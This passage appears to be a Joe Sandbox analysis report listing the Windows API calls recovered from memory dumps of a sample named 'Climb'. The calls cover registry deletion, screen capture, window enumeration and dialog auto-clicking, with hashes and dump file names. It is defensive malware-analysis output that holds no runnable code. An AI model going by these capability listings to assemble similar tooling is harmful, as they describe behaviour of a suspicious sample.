                                                                                                                                                                      • Instruction Fuzzy Hash: CF513DB1600609BFDB219FA0C888ABA7FFCFB58754F004919F94697250E735D949ABB0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,005866D6,?,?), ref: 00588FEE
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00588FFE
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589009
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589016
                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00589024
                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589033
                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0058903C
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589043
                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,005866D6,?,?,00000000,?), ref: 00589054
                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00590C04,?), ref: 0058906D
                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0058907D
                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0058909D
                                                                                                                                                                      • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 005890CD
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 005890F5
                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0058910B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                      • Opcode ID: 3090d6e098ccda32783b5f2ce552b3b0b8b48418ed087ddd8b7c073788332084
                                                                                                                                                                      • Instruction ID: 1dd137a47d760c352d3c607f0510516bb60d94b5a74f6e1ee5fc1d44efe0e3b6
                                                                                                                                                                      • Opcode Fuzzy Hash: 3090d6e098ccda32783b5f2ce552b3b0b8b48418ed087ddd8b7c073788332084
                                                                                                                                                                      • Instruction Fuzzy Hash: 55410475600208EFDB11AF65DC88EAABBB8FB99711F144058FD06E72A0D7719945EB20
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                        • Part of subcall function 0057D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0057C10E,?,?), ref: 0057D415
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D451
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4C8
                                                                                                                                                                        • Part of subcall function 0057D3F8: _wcslen.LIBCMT ref: 0057D4FE
                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0057C154
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0057C1D2
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0057C26A
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0057C2DE
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0057C2FC
                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0057C352
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0057C364
                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0057C382
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0057C3E3
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0057C3F4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                      • API String ID: 146587525-4033151799
                                                                                                                                                                      • Opcode ID: bf7f55e341f33fd62c52b8866c93bf1c40a46e7eb2c32de9af2c1a32eceffda8
                                                                                                                                                                      • Instruction ID: 53bcae131e9e1b2bbd994641382aa926d8efd280e121559de595ff7207ae3a63
                                                                                                                                                                      • Opcode Fuzzy Hash: bf7f55e341f33fd62c52b8866c93bf1c40a46e7eb2c32de9af2c1a32eceffda8
                                                                                                                                                                      • Instruction Fuzzy Hash: B2C17B34204201AFD710DF15D494F2ABFE1BF85318F54C89DE99A8B2A2CB35ED46DB92
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0058A990
                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 0058A9A7
                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0058A9B3
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 0058A9C9
                                                                                                                                                                      • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0058AC15
                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0058AC33
                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0058AC54
                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 0058AC73
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0058AC95
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?), ref: 0058ACBB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                      • String ID: @$(\
                                                                                                                                                                      • API String ID: 3962739598-1489583571
                                                                                                                                                                      • Opcode ID: 079c994bec92fa6581bfe40ca8cf126c64eb743fe1c97c2ad5b330ca5f88fa08
                                                                                                                                                                      • Instruction ID: e246d0ffbccadc33a250891b3d9c18350fbcf79ec6ef64e304657bdb97d136dd
                                                                                                                                                                      • Opcode Fuzzy Hash: 079c994bec92fa6581bfe40ca8cf126c64eb743fe1c97c2ad5b330ca5f88fa08
                                                                                                                                                                      • Instruction Fuzzy Hash: 49B18930600219DFEF14DF68C984BBE7BF2FF44705F18806AED45AA295D770A980CB61
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004F24B0
                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005897B6
                                                                                                                                                                      • GetFocus.USER32 ref: 005897C6
                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 005897D1
                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00589879
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0058992B
                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00589948
                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00589958
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0058998A
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005899CC
                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005899FD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                      • String ID: 0$(\
                                                                                                                                                                      • API String ID: 1026556194-3030511096
                                                                                                                                                                      • Opcode ID: 8ca6e88015a21a7d920b11acd1c7dd74eabe514c3e0a9eb0de6cde1315ae0471
                                                                                                                                                                      • Instruction ID: 712c7dec7bf9434930c17735ab3090ea40090bca5b2ae6bd0b9a7c5bb5b0fea0
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ca6e88015a21a7d920b11acd1c7dd74eabe514c3e0a9eb0de6cde1315ae0471
                                                                                                                                                                      • Instruction Fuzzy Hash: E8818B71504306AFD710EF25C884ABA7BE8FB99354F08092EFD85B7291DB70D905DBA2
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00573035
                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00573045
                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00573051
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0057305E
                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 005730CA
                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00573109
                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0057312D
                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00573135
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0057313E
                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 00573145
                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00573150
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                      • String ID: (
                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                      • Opcode ID: 1d5188ad3ec2de117c734ff69bc896af54361805f8dc5b942aa6463836b31c2a
                                                                                                                                                                      • Instruction ID: c537250f00d09cafb459e6c9e5eb73a97611197ecdfc2473f721646a19185c45
                                                                                                                                                                      • Opcode Fuzzy Hash: 1d5188ad3ec2de117c734ff69bc896af54361805f8dc5b942aa6463836b31c2a
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E61D475D00219EFCB04CFA4D888EAEBBF5FF48310F208519E959A7250D775A941EF60
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 005552E6
                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00555328
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00555339
                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00555345
                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 0055537A
                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 005553B2
                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 005553EB
                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00555445
                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00555477
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 005554EF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                      • String ID: ThumbnailClass
                                                                                                                                                                      • API String ID: 1311036022-1241985126
                                                                                                                                                                      • Opcode ID: 17af7aad05ef21661e1baa749741a76db1f94d8c716b7d3bea7fb6b94d368f57
                                                                                                                                                                      • Instruction ID: c2cdf488cc946dda52b3ebce6d3c2c688a3a43ddd40ece5eacae50f61faf0d50
                                                                                                                                                                      • Opcode Fuzzy Hash: 17af7aad05ef21661e1baa749741a76db1f94d8c716b7d3bea7fb6b94d368f57
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C91B271104A06AFDB04CF24C8B5AAABBA9FF41345F00451AFE8A82191FB31ED59CB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetMenuItemInfoW.USER32(005C29C0,000000FF,00000000,00000030), ref: 0055C973
                                                                                                                                                                      • SetMenuItemInfoW.USER32(005C29C0,00000004,00000000,00000030), ref: 0055C9A8
                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0055C9BA
                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0055CA00
                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0055CA1D
                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 0055CA49
                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 0055CA90
                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0055CAD6
                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0055CAEB
                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0055CB0C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                      • String ID: 0
                                                                                                                                                                      • API String ID: 1460738036-4108050209
                                                                                                                                                                      • Opcode ID: d5cfc4720b15bc3dbf26a91d15d1993d1e6ea674337b1db23dc1b2dd85355215
                                                                                                                                                                      • Instruction ID: d601768b08b59a5d1a6233a369a50de638337bbde38de36214036d3046758c06
                                                                                                                                                                      • Opcode Fuzzy Hash: d5cfc4720b15bc3dbf26a91d15d1993d1e6ea674337b1db23dc1b2dd85355215
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B616B70A0034AAFDF11CFA4C8A9AAE7FB9FB05359F040456ED11A3291D734AD08DB61
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0055E4D4
                                                                                                                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0055E4FA
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055E504
                                                                                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 0055E554
                                                                                                                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0055E570
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                      • API String ID: 1939486746-1459072770
                                                                                                                                                                      • Opcode ID: f3e27304867a94aa75414d95667065579ac286fdb37b6d0a2695498413b8b96c
                                                                                                                                                                      • Instruction ID: 3d5c058b9e54b662b67ee1ac51f11efb53a1b626e8011a766f417cb761584a38
                                                                                                                                                                      • Opcode Fuzzy Hash: f3e27304867a94aa75414d95667065579ac286fdb37b6d0a2695498413b8b96c
                                                                                                                                                                      • Instruction Fuzzy Hash: 1141D2725402197AEB04AA649C4BEFF7FACFF95750F00041AFD01A60C2FA74AA4196A5
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0057D6C4
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0057D6ED
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0057D7A8
                                                                                                                                                                        • Part of subcall function 0057D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0057D70A
                                                                                                                                                                        • Part of subcall function 0057D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0057D71D
                                                                                                                                                                        • Part of subcall function 0057D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0057D72F
                                                                                                                                                                        • Part of subcall function 0057D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0057D765
                                                                                                                                                                        • Part of subcall function 0057D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0057D788
                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0057D753
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                      • API String ID: 2734957052-4033151799
                                                                                                                                                                      • Opcode ID: 8fd54efdaedfd3e5e638b281c6c3d7032196fa24baca919b9b956955650429b5
                                                                                                                                                                      • Instruction ID: 430d63fd42ec23997c608f20338f5b5249d9009a0a0655d1e9834e224947be17
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fd54efdaedfd3e5e638b281c6c3d7032196fa24baca919b9b956955650429b5
                                                                                                                                                                      • Instruction Fuzzy Hash: 51315E75901129BBDB25AB90EC8CEFFBFBCEF55750F004165B809A2140DA349E49EBB0
                                                                                                                                                                      APIs
                                                                                                                                                                      • timeGetTime.WINMM ref: 0055EFCB
                                                                                                                                                                        • Part of subcall function 0050F215: timeGetTime.WINMM(?,?,0055EFEB), ref: 0050F219
                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0055EFF8
                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 0055F01C
                                                                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0055F03E
                                                                                                                                                                      • SetActiveWindow.USER32 ref: 0055F05D
                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0055F06B
                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0055F08A
                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 0055F095
                                                                                                                                                                      • IsWindow.USER32 ref: 0055F0A1
                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 0055F0B2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                      • Opcode ID: 2b5e80907edac45fd2100913ba4b1e4b1b939b83131253515b2a0329726c15d8
                                                                                                                                                                      • Instruction ID: b09826b26d0d98eac441b5235a9590933ed3afce4205eef07e5df96385625641
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b5e80907edac45fd2100913ba4b1e4b1b939b83131253515b2a0329726c15d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 1521A171100609BFE7106F20AC9DE6A7FA9FB64B16F045026FC02922F2CB214D8CA761
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0055F374
                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0055F38A
                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0055F39B
                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0055F3AD
                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0055F3BE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
